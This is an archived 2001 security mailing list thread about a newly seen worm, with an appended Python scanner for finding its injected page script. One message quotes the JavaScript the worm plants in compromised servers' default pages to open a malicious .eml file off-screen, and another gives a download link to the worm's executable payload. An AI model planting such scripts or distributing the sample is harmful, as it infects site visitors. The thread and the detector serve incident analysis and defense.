Security Incidents mailing list archives
RE: New "concept" virus/worm?
From: "Guillaume TARRARE" <gtarrare () webcity fr>
Date: Tue, 18 Sep 2001 19:51:33 +0200
The code written in the default page of a compromised server:
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
....
-----Original Message-----
From: Jay D. Dyson [mailto:jdyson () treachery net]
Sent: Tuesday, 18 September 2001 18:21
To: Incidents List
Cc: Vuln Dev
Subject: Re: New "concept" virus/worm?
-----BEGIN PGP SIGNED MESSAGE-----
On Tue, 18 Sep 2001, Joao Gouveia wrote:

> I kept the executables for analysis, if anyone would like to take a look, drop me an email.

Anyone interested in examining the payload can also pick up a copy
at http://www.treachery.net/~jdyson/worms/readme.exe (MD5 hash of the
payload is at http://www.treachery.net/~jdyson/worms/readme.exe.md5).

> So, what I ask is, does anyone know about this worm? I've done a quick search for it and couldn't find anything like it.

It's a two-prong worm. It appears to be primarily disseminated
via e-mail, and then launches its attacks on web hosts upon successful
infection.
- -Jay
( ( _______
)) )) .--"There's always time for a good cup of coffee"--. >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) | = |-'
`--' `--' `-- What doesn't kill us only makes us stronger. --' `------'
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
-----END PGP SIGNATURE-----
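
An added example, not part of the original messages: a Python check a site owner could run over served pages to find the injected script quoted at the top of this message. It generalizes from that exact string to any `window.open` call inside a `<script>` block that loads a `.eml` file, and flags `top`/`left` values past an assumed off-screen threshold; `find_eml_popups`, `OFFSCREEN_PX` and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# window.open("<target>", ...) with a quoted first argument
OPEN_CALL = re.compile(
    r"""window\.open\s*\(\s*(["'])(?P<target>.*?)\1(?P<rest>[^)]*)\)""", re.I | re.S)
# top= / left= values in the window feature string
COORD = re.compile(r"\b(?:top|left)\s*=\s*(\d+)", re.IGNORECASE)
OFFSCREEN_PX = 3000  # assumed threshold: beyond any ordinary screen size

class ScriptCollector(HTMLParser):
    """Collect the body of every <script> element in a page."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def find_eml_popups(html):
    """Return (target, offscreen) for each window.open call that loads a .eml file."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for script in collector.scripts:
        for call in OPEN_CALL.finditer(script):
            target = call.group("target")
            if target.lower().endswith(".eml"):
                # Coordinates far outside the screen hide the popup from the visitor
                coords = [int(v) for v in COORD.findall(call.group("rest"))]
                hits.append((target, any(c >= OFFSCREEN_PX for c in coords)))
    return hits

# Constructed sample: an ordinary page followed by the script quoted in the message
SAMPLE = ('<html><body><script>window.open("help.html", "h", "top=10,left=10")'
          '</script></body></html>\n'
          '<html><script language="JavaScript">window.open("readme.eml", null,\n'
          '"resizable=no,top=6000,left=6000")</script></html>')
```

A hit with `offscreen` set to `True` matches the pattern in the message; a hit without it still deserves a look, since a default page has little reason to open a mail file.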
